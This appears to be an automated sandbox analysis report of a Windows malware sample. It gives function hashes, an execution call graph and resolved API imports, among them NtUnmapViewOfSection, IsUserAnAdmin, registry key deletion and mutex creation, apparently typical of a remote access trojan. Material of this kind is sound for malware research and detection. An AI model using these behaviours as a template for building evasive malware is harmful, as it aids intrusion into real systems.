                        • Opcode Fuzzy Hash: e8b599259587d6fac404dc38d9862fa7f22170c24996c1aa2d9c7ae93c06da5d
                        • Instruction Fuzzy Hash: B1212271604204DFDB15DF94D984B2ABBB1FB94318F20C96DD90E4F286D33AD447CA61
                        Function 0154D006 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31fe462689eabcbf0706f6fbef0c112dac84bb78a2d2668c7958e6eadd2a7c94
                        • Instruction ID: 78d3f2a5a4b95c601ad206932866bc1b79ee5098671faa474556f09a25284345
                        • Opcode Fuzzy Hash: 31fe462689eabcbf0706f6fbef0c112dac84bb78a2d2668c7958e6eadd2a7c94
                        • Instruction Fuzzy Hash: 872192755093808FCB13CF64D994715BF71FB46218F28C5DAD8498F2A7C33A980ACB62
                        Function 0153D1F7 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                        • Instruction ID: 958ab6094429bf4ee136c03290ef4e697d390bff4c0d69b3e45c2c101eff2d77
                        • Opcode Fuzzy Hash: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                        • Instruction Fuzzy Hash: C6218C76504244DFDB06CF54D9C4B5ABF72FB84224F2485A9ED090B656C33AD42ACBA1
                        Function 0153D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                        • Instruction ID: 225b22155be341ccb9b3350c5dfcc10ba702937b7aa74533e6fc80e8b330d72e
                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                        • Instruction Fuzzy Hash: D411CD72404240CFCB02CF54D5C0B5ABF71FB84224F2482A9D8090F257C37AE456CBA1
                        Function 0154D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                        • Instruction ID: 735318acccb9169e4228228883ff820f26c922ad02ad365866914c2afb931ad9
                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                        • Instruction Fuzzy Hash: B011BB75508280DFCB02CF54C5C4B19BBB1FB84228F24C6A9D8494F296C33AD40ACB61
                        Function 0153D759 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 27dc13e9c878ec06ef909e32a559c8e36b6e3ac6036718f42efa7a5261262d7a
                        • Instruction ID: df9657f6464f504eea210aa3e164fd7f7b936f324c1cf100fa4cff994cb57528
                        • Opcode Fuzzy Hash: 27dc13e9c878ec06ef909e32a559c8e36b6e3ac6036718f42efa7a5261262d7a
                        • Instruction Fuzzy Hash: 8701F7710043849AE7128AA9CC84B67FFF8FF81220F58881AED084F282C339D845C671
                        Function 0153D758 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b5febc22ee7d4638a53618d440ddd75ffbd5680fc84bfdccc05d4822542c6aca
                        • Instruction ID: 46dfc7de041eb70200231509017d5a6dfd5bd2b993ed241a007d58ee649d95bf
                        • Opcode Fuzzy Hash: b5febc22ee7d4638a53618d440ddd75ffbd5680fc84bfdccc05d4822542c6aca
                        • Instruction Fuzzy Hash: 3CF062724053849EE7158A5ADC84B66FFB8FF81625F18C45AED084F287C3799844CAB1

                        Execution Graph

                        Execution Coverage:1.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:4%
                        Total number of Nodes:544
                        Total number of Limit Nodes:14
                        execution_graph 46948 434887 46949 434893 ___scrt_is_nonwritable_in_current_image 46948->46949 46974 434596 46949->46974 46951 43489a 46953 4348c3 46951->46953 47269 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46951->47269 46962 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46953->46962 47270 444251 5 API calls CatchGuardHandler 46953->47270 46955 4348dc 46957 4348e2 ___scrt_is_nonwritable_in_current_image 46955->46957 47271 4441f5 5 API calls CatchGuardHandler 46955->47271 46958 434962 46985 434b14 46958->46985 46962->46958 47272 4433e7 35 API calls 5 library calls 46962->47272 46969 43498e 46971 434997 46969->46971 47273 4433c2 28 API calls _abort 46969->47273 47274 43470d 13 API calls 2 library calls 46971->47274 46975 43459f 46974->46975 47275 434c52 IsProcessorFeaturePresent 46975->47275 46977 4345ab 47276 438f31 10 API calls 4 library calls 46977->47276 46979 4345b0 46980 4345b4 46979->46980 47277 4440bf 46979->47277 46980->46951 46983 4345cb 46983->46951 47293 436e90 46985->47293 46988 434968 46989 4441a2 46988->46989 47295 44f059 46989->47295 46991 4441ab 46992 434971 46991->46992 47299 446815 35 API calls 46991->47299 46994 40e9c5 46992->46994 47301 41cb50 LoadLibraryA GetProcAddress 46994->47301 46996 40e9e1 GetModuleFileNameW 47306 40f3c3 46996->47306 46998 40e9fd 47321 4020f6 46998->47321 47001 4020f6 28 API calls 47002 40ea1b 47001->47002 47327 41be1b 47002->47327 47006 40ea2d 47353 401e8d 47006->47353 47008 40ea36 47009 40ea93 47008->47009 47010 40ea49 47008->47010 47359 401e65 22 API calls 47009->47359 47383 40fbb3 116 API calls 47010->47383 47013 40ea5b 47384 401e65 22 API calls 47013->47384 47014 40eaa3 47360 401e65 22 API calls 47014->47360 47016 40ea67 47385 410f37 36 API calls __EH_prolog 47016->47385 47018 40eac2 47361 40531e 28 API calls 47018->47361 47021 40ead1 47362 406383 28 API calls 47021->47362 47022 40ea79 47386 40fb64 77 API calls 47022->47386 47025 40eadd 47363 401fe2 47025->47363 47026 40ea82 47387 40f3b0 70 API calls 47026->47387 47032 401fd8 11 API calls 47034 40eefb 47032->47034 47033 401fd8 11 API calls 47035 40eafb 47033->47035 47264 4432f6 GetModuleHandleW 47034->47264 47375 401e65 22 API calls 47035->47375 47037 40eb04 47376 401fc0 28 API calls 47037->47376 47039 40eb0f 47377 401e65 22 API calls 47039->47377 47041 40eb28 47378 401e65 22 API calls 47041->47378 47043 40eb43 47044 40ebae 47043->47044 47388 406c1e 28 API calls 47043->47388 47379 401e65 22 API calls 47044->47379 47047 40eb70 47048 401fe2 28 API calls 47047->47048 47049 40eb7c 47048->47049 47050 401fd8 11 API calls 47049->47050 47053 40eb85 47050->47053 47051 40ec02 47380 40d069 47051->47380 47052 40ebbb 47052->47051 47390 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47052->47390 47389 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47053->47389 47055 40ec08 47056 40ea8b 47055->47056 47392 41b2c3 33 API calls 47055->47392 47056->47032 47059 40eba4 47059->47044 47061 40f34f 47059->47061 47475 4139a9 30 API calls 47061->47475 47062 40ec23 47065 40ec76 47062->47065 47393 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47062->47393 47063 40ebe6 47063->47051 47391 4139a9 30 API calls 47063->47391 47398 401e65 22 API calls 47065->47398 47069 40ec7f 47077 40ec90 47069->47077 47078 40ec8b 47069->47078 47070 40ec3e 47072 40ec42 47070->47072 47073 40ec4c 47070->47073 47071 40f365 47476 412475 65 API calls ___scrt_fastfail 47071->47476 47394 407738 30 API calls 47072->47394 47396 401e65 22 API calls 47073->47396 47400 401e65 22 API calls 47077->47400 47399 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47078->47399 47079 40ec47 47395 407260 97 API calls 47079->47395 47084 40f37f 47478 413a23 RegOpenKeyExW RegDeleteValueW 47084->47478 47085 40ec99 47401 41bc5e 28 API calls 47085->47401 47087 40ec55 47087->47065 47090 40ec71 47087->47090 47089 40eca4 47402 401f13 28 API calls 47089->47402 47397 407260 97 API calls 47090->47397 47091 40f392 47479 401f09 11 API calls 47091->47479 47093 40ecaf 47403 401f09 11 API calls 47093->47403 47097 40f39c 47480 401f09 11 API calls 47097->47480 47098 40ecb8 47404 401e65 22 API calls 47098->47404 47101 40f3a5 47481 40dd42 27 API calls 47101->47481 47102 40ecc1 47405 401e65 22 API calls 47102->47405 47104 40f3aa 47482 414f2a 167 API calls _strftime 47104->47482 47108 40ecdb 47406 401e65 22 API calls 47108->47406 47110 40ecf5 47407 401e65 22 API calls 47110->47407 47112 40ed80 47115 40ed8a 47112->47115 47121 40ef06 ___scrt_fastfail 47112->47121 47113 40ed0e 47113->47112 47408 401e65 22 API calls 47113->47408 47116 40ed93 47115->47116 47123 40ee0f 47115->47123 47414 401e65 22 API calls 47116->47414 47118 40ed9c 47415 401e65 22 API calls 47118->47415 47119 40ed23 _wcslen 47119->47112 47409 401e65 22 API calls 47119->47409 47425 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47121->47425 47122 40edae 47416 401e65 22 API calls 47122->47416 47146 40ee0a ___scrt_fastfail 47123->47146 47125 40ed3e 47410 401e65 22 API calls 47125->47410 47128 40edc0 47417 401e65 22 API calls 47128->47417 47130 40ed53 47411 40da34 31 API calls 47130->47411 47131 40ef51 47426 401e65 22 API calls 47131->47426 47135 40ede9 47418 401e65 22 API calls 47135->47418 47136 40ef76 47427 402093 28 API calls 47136->47427 47137 40ed66 47412 401f13 28 API calls 47137->47412 47140 40ed72 47413 401f09 11 API calls 47140->47413 47142 40ef88 47428 41376f 14 API calls 47142->47428 47144 40edfa 47419 40cdf9 45 API calls _wcslen 47144->47419 47145 40ed7b 47145->47112 47146->47123 47420 413947 31 API calls 47146->47420 47150 40ef9e 47429 401e65 22 API calls 47150->47429 47151 40eea3 ctype 47421 401e65 22 API calls 47151->47421 47153 40efaa 47430 43baac 39 API calls _strftime 47153->47430 47156 40efb7 47158 40efe4 47156->47158 47431 41cd9b 86 API calls ___scrt_fastfail 47156->47431 47157 40eeba 47157->47131 47422 401e65 22 API calls 47157->47422 47432 402093 28 API calls 47158->47432 47160 40eed7 47423 41bc5e 28 API calls 47160->47423 47164 40efc8 CreateThread 47164->47158 47594 41d45d 10 API calls 47164->47594 47165 40eff9 47433 402093 28 API calls 47165->47433 47166 40eee3 47424 40f474 103 API calls 47166->47424 47169 40f008 47434 41b4ef 79 API calls 47169->47434 47170 40eee8 47170->47131 47172 40eeef 47170->47172 47172->47056 47173 40f00d 47435 401e65 22 API calls 47173->47435 47175 40f019 47436 401e65 22 API calls 47175->47436 47177 40f02b 47437 401e65 22 API calls 47177->47437 47179 40f04b 47438 43baac 39 API calls _strftime 47179->47438 47181 40f058 47439 401e65 22 API calls 47181->47439 47183 40f063 47440 401e65 22 API calls 47183->47440 47185 40f074 47441 401e65 22 API calls 47185->47441 47187 40f089 47442 401e65 22 API calls 47187->47442 47189 40f09a 47190 40f0a1 StrToIntA 47189->47190 47443 409de4 168 API calls _wcslen 47190->47443 47192 40f0b3 47444 401e65 22 API calls 47192->47444 47194 40f0bc 47195 40f101 47194->47195 47445 4344ea 47194->47445 47453 401e65 22 API calls 47195->47453 47200 40f0e4 47201 40f0eb CreateThread 47200->47201 47201->47195 47588 419fb4 102 API calls 2 library calls 47201->47588 47202 40f159 47455 401e65 22 API calls 47202->47455 47203 40f111 47203->47202 47205 4344ea new 22 API calls 47203->47205 47206 40f126 47205->47206 47454 401e65 22 API calls 47206->47454 47208 40f138 47211 40f13f CreateThread 47208->47211 47209 40f1cc 47461 401e65 22 API calls 47209->47461 47210 40f162 47210->47209 47456 401e65 22 API calls 47210->47456 47211->47202 47593 419fb4 102 API calls 2 library calls 47211->47593 47214 40f17e 47457 401e65 22 API calls 47214->47457 47215 40f1d5 47216 40f21a 47215->47216 47462 401e65 22 API calls 47215->47462 47466 41b60d 79 API calls 47216->47466 47220 40f193 47458 40d9e8 31 API calls 47220->47458 47221 40f223 47467 401f13 28 API calls 47221->47467 47222 40f1ea 47463 401e65 22 API calls 47222->47463 47225 40f22e 47468 401f09 11 API calls 47225->47468 47227 40f1a6 47459 401f13 28 API calls 47227->47459 47229 40f1ff 47464 43baac 39 API calls _strftime 47229->47464 47231 40f237 CreateThread 47234 40f264 47231->47234 47235 40f258 CreateThread 47231->47235 47589 40f7a7 120 API calls 47231->47589 47232 40f1b2 47460 401f09 11 API calls 47232->47460 47237 40f279 47234->47237 47238 40f26d CreateThread 47234->47238 47235->47234 47590 4120f7 137 API calls 47235->47590 47242 40f2cc 47237->47242 47469 402093 28 API calls 47237->47469 47238->47237 47591 4126db 38 API calls ___scrt_fastfail 47238->47591 47240 40f1bb CreateThread 47240->47209 47592 401be9 49 API calls _strftime 47240->47592 47241 40f20c 47465 40c162 7 API calls 47241->47465 47471 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47242->47471 47245 40f29c 47470 4052fd 28 API calls 47245->47470 47248 40f2e4 47248->47101 47472 41bc5e 28 API calls 47248->47472 47253 40f2fd 47473 41361b 31 API calls 47253->47473 47258 40f313 47474 401f09 11 API calls 47258->47474 47260 40f346 DeleteFileW 47261 40f34d 47260->47261 47262 40f31e 47260->47262 47477 41bc5e 28 API calls 47261->47477 47262->47260 47262->47261 47263 40f334 Sleep 47262->47263 47263->47262 47265 434984 47264->47265 47265->46969 47266 44341f 47265->47266 47596 44319c 47266->47596 47269->46951 47270->46955 47271->46962 47272->46958 47273->46971 47274->46957 47275->46977 47276->46979 47281 44fb68 47277->47281 47280 438f5a 8 API calls 3 library calls 47280->46980 47284 44fb81 47281->47284 47283 4345bd 47283->46983 47283->47280 47285 434fcb 47284->47285 47286 434fd6 IsProcessorFeaturePresent 47285->47286 47287 434fd4 47285->47287 47289 435018 47286->47289 47287->47283 47292 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47289->47292 47291 4350fb 47291->47283 47292->47291 47294 434b27 GetStartupInfoW 47293->47294 47294->46988 47296 44f06b 47295->47296 47297 44f062 47295->47297 47296->46991 47300 44ef58 48 API calls 4 library calls 47297->47300 47299->46991 47300->47296 47302 41cb8f LoadLibraryA GetProcAddress 47301->47302 47303 41cb7f GetModuleHandleA GetProcAddress 47301->47303 47304 41cbb8 44 API calls 47302->47304 47305 41cba8 LoadLibraryA GetProcAddress 47302->47305 47303->47302 47304->46996 47305->47304 47483 41b4a8 FindResourceA 47306->47483 47310 40f3ed _Yarn 47493 4020b7 47310->47493 47313 401fe2 28 API calls 47314 40f413 47313->47314 47315 401fd8 11 API calls 47314->47315 47316 40f41c 47315->47316 47317 43bd51 _Yarn 21 API calls 47316->47317 47318 40f42d _Yarn 47317->47318 47499 406dd8 47318->47499 47320 40f460 47320->46998 47322 40210c 47321->47322 47323 4023ce 11 API calls 47322->47323 47324 402126 47323->47324 47325 402569 28 API calls 47324->47325 47326 402134 47325->47326 47326->47001 47536 4020df 47327->47536 47329 41be2e 47333 41bea0 47329->47333 47341 401fe2 28 API calls 47329->47341 47344 401fd8 11 API calls 47329->47344 47348 41be9e 47329->47348 47540 4041a2 28 API calls 47329->47540 47541 41ce34 47329->47541 47330 401fd8 11 API calls 47331 41bed0 47330->47331 47332 401fd8 11 API calls 47331->47332 47334 41bed8 47332->47334 47552 4041a2 28 API calls 47333->47552 47337 401fd8 11 API calls 47334->47337 47339 40ea24 47337->47339 47338 41beac 47340 401fe2 28 API calls 47338->47340 47349 40fb17 47339->47349 47342 41beb5 47340->47342 47341->47329 47343 401fd8 11 API calls 47342->47343 47345 41bebd 47343->47345 47344->47329 47347 41ce34 28 API calls 47345->47347 47347->47348 47348->47330 47350 40fb23 47349->47350 47352 40fb2a 47349->47352 47578 402163 11 API calls 47350->47578 47352->47006 47355 402163 47353->47355 47354 40219f 47354->47008 47355->47354 47579 402730 11 API calls 47355->47579 47357 402184 47580 402712 11 API calls std::_Deallocate 47357->47580 47359->47014 47360->47018 47361->47021 47362->47025 47364 401ff1 47363->47364 47371 402039 47363->47371 47365 4023ce 11 API calls 47364->47365 47366 401ffa 47365->47366 47367 40203c 47366->47367 47368 402015 47366->47368 47582 40267a 11 API calls 47367->47582 47581 403098 28 API calls 47368->47581 47372 401fd8 47371->47372 47373 4023ce 11 API calls 47372->47373 47374 401fe1 47373->47374 47374->47033 47375->47037 47376->47039 47377->47041 47378->47043 47379->47052 47583 401fab 47380->47583 47382 40d073 CreateMutexA GetLastError 47382->47055 47383->47013 47384->47016 47385->47022 47386->47026 47388->47047 47389->47059 47390->47063 47391->47051 47392->47062 47393->47070 47394->47079 47395->47073 47396->47087 47397->47065 47398->47069 47399->47077 47400->47085 47401->47089 47402->47093 47403->47098 47404->47102 47405->47108 47406->47110 47407->47113 47408->47119 47409->47125 47410->47130 47411->47137 47412->47140 47413->47145 47414->47118 47415->47122 47416->47128 47417->47135 47418->47144 47419->47146 47420->47151 47421->47157 47422->47160 47423->47166 47424->47170 47425->47131 47426->47136 47427->47142 47428->47150 47429->47153 47430->47156 47431->47164 47432->47165 47433->47169 47434->47173 47435->47175 47436->47177 47437->47179 47438->47181 47439->47183 47440->47185 47441->47187 47442->47189 47443->47192 47444->47194 47449 4344ef 47445->47449 47446 43bd51 _Yarn 21 API calls 47446->47449 47447 40f0d1 47452 401e65 22 API calls 47447->47452 47449->47446 47449->47447 47584 442f80 7 API calls 2 library calls 47449->47584 47585 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47449->47585 47586 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47449->47586 47452->47200 47453->47203 47454->47208 47455->47210 47456->47214 47457->47220 47458->47227 47459->47232 47460->47240 47461->47215 47462->47222 47463->47229 47464->47241 47465->47216 47466->47221 47467->47225 47468->47231 47469->47245 47471->47248 47472->47253 47473->47258 47474->47262 47475->47071 47477->47084 47478->47091 47479->47097 47480->47101 47481->47104 47587 41ad17 103 API calls 47482->47587 47484 41b4c5 LoadResource LockResource SizeofResource 47483->47484 47485 40f3de 47483->47485 47484->47485 47486 43bd51 47485->47486 47491 446137 __Getctype 47486->47491 47487 446175 47503 4405dd 20 API calls _abort 47487->47503 47489 446160 RtlAllocateHeap 47490 446173 47489->47490 47489->47491 47490->47310 47491->47487 47491->47489 47502 442f80 7 API calls 2 library calls 47491->47502 47494 4020bf 47493->47494 47504 4023ce 47494->47504 47496 4020ca 47508 40250a 47496->47508 47498 4020d9 47498->47313 47500 4020b7 28 API calls 47499->47500 47501 406dec 47500->47501 47501->47320 47502->47491 47503->47490 47505 402428 47504->47505 47506 4023d8 47504->47506 47505->47496 47506->47505 47515 4027a7 11 API calls std::_Deallocate 47506->47515 47509 40251a 47508->47509 47510 402520 47509->47510 47511 402535 47509->47511 47516 402569 47510->47516 47526 4028e8 28 API calls 47511->47526 47514 402533 47514->47498 47515->47505 47527 402888 47516->47527 47518 40257d 47519 402592 47518->47519 47520 4025a7 47518->47520 47532 402a34 22 API calls 47519->47532 47534 4028e8 28 API calls 47520->47534 47523 40259b 47533 4029da 22 API calls 47523->47533 47525 4025a5 47525->47514 47526->47514 47528 402890 47527->47528 47529 402898 47528->47529 47535 402ca3 22 API calls 47528->47535 47529->47518 47532->47523 47533->47525 47534->47525 47537 4020e7 47536->47537 47538 4023ce 11 API calls 47537->47538 47539 4020f2 47538->47539 47539->47329 47540->47329 47542 41ce41 47541->47542 47543 41cea0 47542->47543 47547 41ce51 47542->47547 47544 41ceba 47543->47544 47545 41cfe0 28 API calls 47543->47545 47562 41d146 28 API calls 47544->47562 47545->47544 47548 41ce89 47547->47548 47553 41cfe0 47547->47553 47561 41d146 28 API calls 47548->47561 47549 41ce9c 47549->47329 47552->47338 47555 41cfe8 47553->47555 47554 41d01a 47554->47548 47555->47554 47556 41d01e 47555->47556 47559 41d002 47555->47559 47573 402725 22 API calls 47556->47573 47563 41d051 47559->47563 47561->47549 47562->47549 47564 41d05b __EH_prolog 47563->47564 47574 402717 22 API calls 47564->47574 47566 41d06e 47575 41d15d 11 API calls 47566->47575 47568 41d094 47569 41d0cc 47568->47569 47576 402730 11 API calls 47568->47576 47569->47554 47571 41d0b3 47577 402712 11 API calls std::_Deallocate 47571->47577 47574->47566 47575->47568 47576->47571 47577->47569 47578->47352 47579->47357 47580->47354 47581->47371 47582->47371 47584->47449 47595 4127ee 61 API calls 47590->47595 47597 4431a8 _abort 47596->47597 47598 4431c0 47597->47598 47599 4432f6 _abort GetModuleHandleW 47597->47599 47618 445888 EnterCriticalSection 47598->47618 47601 4431b4 47599->47601 47601->47598 47630 44333a GetModuleHandleExW 47601->47630 47602 443266 47619 4432a6 47602->47619 47606 44323d 47609 443255 47606->47609 47639 4441f5 5 API calls CatchGuardHandler 47606->47639 47607 443283 47622 4432b5 47607->47622 47608 4432af 47641 457729 5 API calls CatchGuardHandler 47608->47641 47640 4441f5 5 API calls CatchGuardHandler 47609->47640 47610 4431c8 47610->47602 47610->47606 47638 443f50 20 API calls _abort 47610->47638 47618->47610 47642 4458d0 LeaveCriticalSection 47619->47642 47621 44327f 47621->47607 47621->47608 47643 448cc9 47622->47643 47625 4432e3 47628 44333a _abort 8 API calls 47625->47628 47626 4432c3 GetPEB 47626->47625 47627 4432d3 GetCurrentProcess TerminateProcess 47626->47627 47627->47625 47629 4432eb ExitProcess 47628->47629 47631 443364 GetProcAddress 47630->47631 47632 443387 47630->47632 47637 443379 47631->47637 47633 443396 47632->47633 47634 44338d FreeLibrary 47632->47634 47635 434fcb CatchGuardHandler 5 API calls 47633->47635 47634->47633 47636 4433a0 47635->47636 47636->47598 47637->47632 47638->47606 47639->47609 47640->47602 47642->47621 47644 448cee 47643->47644 47648 448ce4 47643->47648 47649 4484ca 47644->47649 47646 434fcb CatchGuardHandler 5 API calls 47647 4432bf 47646->47647 47647->47625 47647->47626 47648->47646 47650 4484f6 47649->47650 47651 4484fa 47649->47651 47650->47651 47654 44851a 47650->47654 47656 448566 47650->47656 47651->47648 47653 448526 GetProcAddress 47655 448536 __crt_fast_encode_pointer 47653->47655 47654->47651 47654->47653 47655->47651 47657 448587 LoadLibraryExW 47656->47657 47662 44857c 47656->47662 47658 4485a4 GetLastError 47657->47658 47659 4485bc 47657->47659 47658->47659 47660 4485af LoadLibraryExW 47658->47660 47661 4485d3 FreeLibrary 47659->47661 47659->47662 47660->47659 47661->47662 47662->47650 47663 404e26 WaitForSingleObject 47664 404e40 SetEvent FindCloseChangeNotification 47663->47664 47665 404e57 closesocket 47663->47665 47666 404ed8 47664->47666 47667 404e64 47665->47667 47668 404e7a 47667->47668 47676 4050e4 83 API calls 47667->47676 47670 404e8c WaitForSingleObject 47668->47670 47671 404ece SetEvent CloseHandle 47668->47671 47677 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47670->47677 47671->47666 47673 404e9b SetEvent WaitForSingleObject 47678 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47673->47678 47675 404eb3 SetEvent CloseHandle CloseHandle 47675->47671 47676->47668 47677->47673 47678->47675 47679 448299 GetLastError 47680 4482b2 47679->47680 47681 4482b8 47679->47681 47705 4487bc 11 API calls 2 library calls 47680->47705 47686 44830f SetLastError 47681->47686 47698 445af3 47681->47698 47685 4482d2 47706 446782 20 API calls _free 47685->47706 47687 448318 47686->47687 47690 4482e7 47690->47685 47692 4482ee 47690->47692 47691 4482d8 47693 448306 SetLastError 47691->47693 47708 448087 20 API calls _abort 47692->47708 47693->47687 47695 4482f9 47709 446782 20 API calls _free 47695->47709 47697 4482ff 47697->47686 47697->47693 47704 445b00 __Getctype 47698->47704 47699 445b40 47711 4405dd 20 API calls _abort 47699->47711 47700 445b2b RtlAllocateHeap 47701 445b3e 47700->47701 47700->47704 47701->47685 47707 448812 11 API calls 2 library calls 47701->47707 47704->47699 47704->47700 47710 442f80 7 API calls 2 library calls 47704->47710 47705->47681 47706->47691 47707->47690 47708->47695 47709->47697 47710->47704 47711->47701 47712 40165e 47713 401666 47712->47713 47714 401669 47712->47714 47715 4016a8 47714->47715 47717 401696 47714->47717 47716 4344ea new 22 API calls 47715->47716 47718 40169c 47716->47718 47719 4344ea new 22 API calls 47717->47719 47719->47718

                        Executed Functions

                        Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
